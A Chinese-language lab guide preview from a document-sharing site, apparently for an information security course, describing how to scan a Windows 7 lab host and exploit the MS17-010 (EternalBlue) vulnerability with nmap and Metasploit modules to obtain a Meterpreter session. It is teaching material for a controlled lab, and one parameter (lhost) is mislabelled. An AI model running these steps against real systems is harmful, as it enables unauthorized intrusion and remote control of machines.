信息安全技術基礎 實訓指導書 漏洞探測驗證實訓指導文檔_第1頁
信息安全技術基礎 實訓指導書 漏洞探測驗證實訓指導文檔_第2頁
信息安全技術基礎 實訓指導書 漏洞探測驗證實訓指導文檔_第3頁
信息安全技術基礎 實訓指導書 漏洞探測驗證實訓指導文檔_第4頁
信息安全技術基礎 實訓指導書 漏洞探測驗證實訓指導文檔_第5頁
已閱讀5頁,還剩1頁未讀 繼續免費閱讀

下載本文檔

版權說明:本文檔由用戶提供并上傳,收益歸屬內容提供方,若內容存在侵權,請進行舉報或認領

文檔簡介

MS17_010漏洞驗證實訓指導1.登錄Windows7,Administrators密碼為“123456”2.運行cmd,輸入“ipconfig”,查看ip地址可以看到服務器的ip是“192.168.15.126”,這時我們切換到kali3.用ping測試和服務?器的連通性,輸入“ping192.168.15.126”發現連通正常,按Ctrl+C中斷ping4.輸入“nmap-O192.168.15.126-T4”來掃描服務器“其中參數-O為掃描操作系統信息,-T4為?4線程掃描,提升速度”445端口對應的服務是“microsoft-ds”,說明服務器開啟了smb服?務,發現服務器操作系統版本可能為Windwos7|2008|8.1,判斷服務器?可能存在“永恒之藍漏洞”5.輸入”msfconsole”啟動msf對服務器進行滲透測試6.輸入命令“searchms17_010”,查看關于永恒之藍漏洞的模塊7.輸入“useauxiliary/scanner/smb/smb_ms17_010”調用掃描模塊8.輸入命令“setrhosts192.168.15.126”設置目標ip為服務器ip9.輸入“run”命令進行測試出現綠色加號,回彈英文信息為“主機大概率會受到MS17-010漏洞影響”,說明主機大概率存在“永恒之藍”漏洞”10.輸入“useexploit/windows/smb/ms17_010_eternalblue”調用永恒之藍利用模塊11. 設置攻擊載荷,選擇后滲透模塊。12.接著設置必要參數,包括rhosts(目標主機IP地址)、lhost(目標主機IP地址)13.輸入命令“run”,開始滲透。看到屏幕出現“Meterpretersession1opend”并出現Meterpreter>命令提示符,表示滲透成功。1

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯系上傳者。文件的所有權益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網頁內容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
  • 4. 未經權益所有人同意不得將文件中的內容挪作商業或盈利用途。
  • 5. 人人文庫網僅提供信息存儲空間,僅對用戶上傳內容的表現方式做保護處理,對用戶上傳分享的文檔內容本身不做任何修改或編輯,并不能對任何下載內容負責。
  • 6. 下載文件中如有侵權或不適當內容,請與我們聯系,我們立即糾正。
  • 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論